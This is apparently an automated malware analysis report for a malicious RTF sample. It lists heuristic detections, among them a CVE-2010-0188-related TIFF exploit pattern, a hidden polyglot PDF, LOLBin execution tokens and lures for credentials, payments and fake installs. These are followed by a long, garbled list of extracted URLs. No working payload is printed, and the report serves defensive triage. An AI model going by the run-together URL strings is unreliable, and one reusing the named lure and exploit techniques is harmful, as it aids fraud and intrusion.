Malicious RTF — malware analysis report

Heuristics 15

• CCITTFaxDecode + TIFF/XFA exploit prep — LibTIFF CVE-family indicator high CVE related PDF_CCITT_CVE_2010_0188_RELATED
  PDF uses /CCITTFaxDecode together with TIFF/XFA exploit-preparation markers such as rawValue image-field assignment, TIFF data, or heap-spray JavaScript. This matches the delivery pattern for Adobe Reader LibTIFF/CCITTFax parser exploit families, including CVE-2010-0188, but does not prove the exact malformed TIFF primitive.
• Recovery secret / private key request critical SE_SECRET_RECOVERY_LURE
  Document requests recovery phrases, private keys, backup codes, or saved passwords. Requests for these secrets in a document are high-risk.
• Secondary embedded PDF body has suspicious static findings critical POLYGLOT_CHILD_PDF_STATIC_TRIAGE
  A valid PDF body was found at a nonzero offset inside another container and its carved contents matched PDF exploit or lure heuristics. This catches polyglots where the top-level magic routes to ZIP/OLE while a PDF reader or downstream parser opens the hidden PDF payload.
• Reference to CreateProcess API high SC_STR_CREATEPROCESS
  Reference to CreateProcess API
• LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
  Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
• Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
  Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
• Payment redirection / bank-detail change lure high SE_PAYMENT_REDIRECT_LURE
  Document describes new or changed bank, wire, ACH, IBAN, SWIFT, or routing instructions — a high-value business-email-compromise pattern
• Browser extension / update installation lure high SE_BROWSER_INSTALL_LURE
  Document tells the user to install a browser extension, plugin, viewer, or browser update to view content — a common social-engineering path for credential theft and malware installation
• ASCIIHexDecode filter (with exploit indicators) medium PDF_FILTER_HEX
  Hex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes
• Urgency / deadline lure low SE_URGENCY_LURE
  Document contains urgency or deadline language ('account will be terminated', 'action required within 24 hours', etc.) — useful context, but low-signal without other findings
• Visual download / call-to-action button lure low SE_DOWNLOAD_BUTTON
  Document contains a call-to-action phrase ('Click here to download', 'Download Now', etc.) — low-signal unless other findings point to a malicious workflow
• XFA form low PDF_XFA
  PDF uses XML Forms Architecture — can contain script logic
• ASCII85Decode filter (with exploit indicators) low PDF_FILTER_85
  ASCII85 encoding filter present alongside exploit delivery indicators — uncommon outside of obfuscation
• Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
• Embedded URL info EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL http://smb://loginShelldefault

  • https://%@/%@?%@Failed
  • https://%@/.well-known/webfinger?resource=%@Microsoft
  • https://enterpriseregistration.%@/enrollmentserver/contract?api-version=1.0https://enterpriseregistration.windows.net/%@/enrollmentserver/contract?api-version=1.0unrecognized
  • https://%@/%@access_tokenxms_ccvaluesFailed
  • https://enterpriseregistration.%@/enrollmentserver/contracthttps://enterpriseregistration.windows.net/%@/enrollmentserver/contractcom.microsoft.msidcache-%@browserwpjWPJ
  • https://%@/.well-known/webfinger(Legacy
  • https://%@/%@/%@/%@It
  • https://fakeurl.contoso.comHandling
  • https://%@foci-%@service=%@
  • https://ccext.adobecces.comhttps://ccext.stage.adobecces.comLinkX-Request-IdX-Request-IDX-Amz-Cf-IdX-Amz-Cf-IDX-Cache?/##rel=
  • https://http://failed
  • http://www.appinf.com/features/no-whitespace-in-element-contentpDocumentType-
  • http://www.appinf.com/features/enable-partial-readsCannot
  • https://appleid.apple.comCould
  • https://%s/.well-known/pvd%sapplication/pvd+jsonexpiresen_US_POSIXyyyy-MM-dd
  • https://%s%sresolverusing
  • http://ParseHttpUrl
  • http://www.dns-sd.org/ServiceTypes.html
  • https://%@DVTAssertionHandlerAssertion
  • https://app.getpocket.com/https://getpocket.com/lohttps://getpocket.com/signup?src=extension&route=/extension_login_successThe
  • https://getpocket.com/v3/send/https://getpocket.com/v3/suggested_tags/https://getpocket.com/v3/get/Decode
  • https://getpocket.com/v3/oauth/authorize.phphttps://getpocket.com/v3/guid/cxt_suggested_availablecxt_suggested_cntRequest
  • http://ns.adobe.com/pdfx/1.3/pdfxidAuthorSubjectCreationDate--TextModDate--Texthttp://purl.org/dc/elements/1.1/creatorBaseURLCreatorTooldescriptionx-defaulttitleCreateDatepdf:CreationDateModifyDatepdf:ModDatepdfxpdfepdfaidMetadataDateXMLuuid:Formatapplication/pdfInstanceIDNull
  • http://ns.adobe.com/xap/1.0/Keywordshttp://ns.adobe.com/pdf/1.3/http://www.aiim.org/pdfa/ns/id/conformancepartamdPDMetadataFTPDFCreationPrivateadbe_style_%.4xrgb(adbe_text_%.4xReasonNACreatorSubDetailDoNotProcessPass_DV_Qualifierforce_qualifyCollectAnalyticsDocumentSizeLanguageR2LNonTier1Or2Contentwith
  • http://ns.adobe.com/pdf/navigator/navigators/EmailArchive/2007NavigatorsunknownobliqueblackheavydemiboldsemiboldCollectionvalueADBE_CompoundTypePaginationBackgroundHeaderFooterIdentityVirtualWatermarkFGPDBatesPermsUR3ReferenceTransformMethodTransformParamsXFAByteRangeViewerPreferencesRightsDocMDPSigFlagsMarkInfoMarkedGRAYRGB
  • http://www.npes.org/pdfx/ns/id/PDF/X-5pgPDF/X-5nISO_PDFEVersionhttp://www.aiim.org/pdfe/ns/id/PDF/E-1http://www.npes.org/pdfvt/ns/id/GTS_PDFVTVersionPDF/VT-1PDF/VT-2PDF/VT-2shttp://www.aiim.org/pdfua/ns/id/pdfuaid:partPDF/UA-1DocumentFormExAnnotsExSignatureEFFullSaveFillInImportExportSubmitStandaloneSpawnTemplateOnlineBarcodePlaintextCreateModifyCopyUPNewWindowIsMapFitHFitVFitBHFitBVFitBXYZFitRFitFoBlAllUnknown
  • http://ns.adobe.com/textLayout/2008
  • http://iso.org/pdf/ssnhttp://iso.org/pdf2/ssnhttp://adobe.com/FTPDFPDSReadOBJR=
  • http://ns.adobe.com/xap/1.0/mm/DocumentIDVersionIDRenditionClassIndexedEIImage
  • http://www.w3.org/1999/xhtmlbhttp://www.w3.org/1999/xhtmlihttp://www.w3.org/1999/xhtmlspanhttp://www.w3.org/1999/xhtmlphttp://www.w3.org/1999/xhtmlbodyhttp://www.w3.org/1999/xhtmlbrhttp://www.xfa.org/schema/xfa-data/1.0/APIVersiontext-alignleftrightcenterjustifytext-decorationdoublewordline-throughcolorvertical-alignline-heightfont-sizefont-weightfont-stylefont-familyfont-variantsmall-capsfont-stretchfont100200300400500600700800900ultra-condensedextra-condensedcondensedsemi-condensedsemi-expandedexpandedextra-expandedultra-expandedptxfa-spacerunyesltrrtlAcroform:Acrobat:double
  • http://www.xfa.org/schema/xfa-data/1.0/
  • http://www.w3.org/1999/xhtml
  • http://www.w3.org/2000/svg
  • http://www.w3.org/1999/xlink
  • http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd
  • http://ns.adobe.com/ucf/1.0/
  • http://ns.adobe.com/pdf/navigator/2007idversionapiVersionsrcloadAsdefaultmodulemimetypenamesIDcategoryiconinitialViewsplitDirectionsplitPositionlocalesinitialFieldsasfhorizontalverticalhttp://ns.adobe.com/pdf/navigator/locales/2007localestrings/strings.asfxhttp://ns.adobe.com/asfstrvalen_USfieldvisibleeditabledisplayName%d
  • http://www.w3.org/1999/xhtmlhttp-equivContent-Typecontenttext/html
  • https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMMLBOGUSimages/image/x-pngAlternative
  • https://login.windows.net/example.com.UTCyyyy-MM-dd
  • http://schemas.microsoft.com/rel/trusted-realmtenant_discovery_endpointDRS
  • http://www.w3.org/XML/1998/namespacehttp://www.w3.org/xmlns/2000/xmlns_contexts.size(
  • http://xml.org/sax/features/validationhttp://xml.org/sax/features/namespaceshttp://xml.org/sax/features/namespace-prefixeshttp://xml.org/sax/features/external-general-entitieshttp://xml.org/sax/features/external-parameter-entitieshttp://xml.org/sax/features/string-interninghttp://xml.org/sax/properties/declaration-handlerhttp://xml.org/sax/properties/lexical-handlerout
  • http://www.w3.org/XML/1998/namespacehttp://www.w3.org/2000/xmlns/RandomInputStreamEXPAT_ENTROPY_DEBUGEntropy
  • https://configuration.apple.com/configurations/internetservices/cloudkitvoicebanking-1.0.plistServerConfigChecker
  • https://hbrt.adobe.com/xe-receiver/config//xe-receiver/events/PII
  • https://hbrcv.adobe.com/headlightshttps://hl2rcv.adobe.com/headlightssettingsmaxdiskspace10retryintervalmaxretries3urlhibernateidletimeloggingidlepollingintervalidlethresholdidleactivebiasdisableIdlehttp://localhost/headlightshttp://[^/]+
  • https://init.itunes.apple.com/bag.xml?ix=5https://albert.apple.com/deviceservices/deviceActivationhttp://raptor-dr.apple.com:8080/raptor/processorhttps://albert.apple.com/deviceservices/drmHandshakehttps://tbsc.apple.com/ingest/registerhttps://tbsc.apple.com/oob/vendhttps://albert.apple.com/deviceservices/ucertVendhttps://tbsc.apple.com/ucrt/vend2https://albert.apple.com/deviceservices/basebandhttps://albert.apple.com/deviceservices/certifySBhttps://static.ips.apple.com/absinthe-cert/certificate.cerhttps://albert.apple.com/deviceservices/sessionhttps://humb.apple.com/humbug/baacreateXMLRequestFailed
  • https://developer.apple.com/registerADCAudienceCheckErrorDomainDVTFuture

  +8 more URL(s)

Open this report in the interactive analyzer, or submit your own file for analysis.